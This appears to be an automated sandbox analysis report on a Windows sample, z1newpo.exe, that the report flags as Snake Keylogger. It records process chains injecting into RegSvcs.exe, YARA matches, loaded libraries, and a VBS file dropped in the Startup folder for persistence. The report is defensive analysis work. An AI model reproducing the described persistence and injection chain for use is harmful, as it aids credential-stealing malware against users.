                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFF81013_2_05FFF810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFF80113_2_05FFF801
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFF3B813_2_05FFF3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFF3A813_2_05FFF3A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF8BA013_2_05FF8BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF0B2013_2_05FF0B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFEB0813_2_05FFEB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFEAF813_2_05FFEAF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFE25813_2_05FFE258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFE24913_2_05FFE249
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: String function: 004115D7 appears 36 times
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: String function: 00416C70 appears 39 times
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: String function: 00445AE0 appears 65 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 0040E710 appears 44 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00401B10 appears 50 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00408F40 appears 38 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004301F8 appears 36 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004115D7 appears 72 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00416C70 appears 78 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004181F2 appears 42 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00445AE0 appears 130 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 0041341F appears 36 times
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00422240 appears 38 times
                    Source: z1newpo.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: name.exe PID: 788, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, z.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, z.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,2_2_004333BE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,2_2_00464EAE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,12_2_004333BE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,12_2_00464EAE
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                    Source: C:\Users\user\Desktop\z1newpo.exeFile created: C:\Users\user\AppData\Local\directoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\z1newpo.exeFile created: C:\Users\user~1\AppData\Local\Temp\ClintonJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                    Source: z1newpo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\z1newpo.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002812000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002822000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002830000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002862000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002892000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000028A2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000028B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: z1newpo.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\z1newpo.exeFile read: C:\Users\user\Desktop\z1newpo.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\z1newpo.exe "C:\Users\user\Desktop\z1newpo.exe"
                    Source: C:\Users\user\Desktop\z1newpo.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\z1newpo.exe"
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z1newpo.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
                    Source: C:\Users\user\Desktop\z1newpo.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\z1newpo.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z1newpo.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: z1newpo.exeStatic file information: File size 1342755 > 1048576
                    Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.1256660434.0000000004550000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1255416587.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393904263.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393272739.0000000004640000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.1256660434.0000000004550000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1255416587.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393904263.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393272739.0000000004640000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                    Source: z1newpo.exeStatic PE information: real checksum: 0xa961f should be: 0x150d2a
                    Source: name.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x150d2a
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00416CB5 push ecx; ret 2_2_00416CC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02459C30 push esp; retf 04AEh3_2_02459D55
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245891E pushad ; iretd 3_2_0245891F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02458C2F pushfd ; iretd 3_2_02458C30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02458DDF push esp; iretd 3_2_02458DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06032DBF pushfd ; retf 3_2_06032DC1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06039241 push es; ret 3_2_06039244
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00416CB5 push ecx; ret 12_2_00416CC8
                    Source: C:\Users\user\Desktop\z1newpo.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to dropped file
